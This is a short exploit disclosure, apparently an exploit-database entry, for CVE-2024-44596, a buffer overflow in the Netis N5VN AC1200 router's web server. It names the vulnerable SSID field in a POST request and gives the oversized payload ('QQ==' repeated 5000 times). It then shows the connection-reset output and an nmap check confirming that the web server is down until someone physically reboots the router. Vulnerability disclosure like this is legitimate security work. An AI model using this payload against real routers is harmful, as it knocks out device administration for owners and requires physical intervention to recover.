
Date: 05/03/2024
Exploit Author: Van Lam Nguyen
Facebook: fb.com/vanlam1412
Vendor Homepage: Netis Systems
Version: Netis N5VN AC1200 V1.0.1.1742
Tested on: Windows
CVE : CVE-2024-44596
There exist a buffer overflow vulnerability in Netis N5VN AC1200 router that can allow an attacker to crash the web server running on the router by sending a crafted request
To bring back the http (webserver), a user must physically reboot the route.
POST request to change ssid Wireless 2.4G ('ssid': 'QQ==' * 5000)
Successfully: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http
Watch the video demonstration here

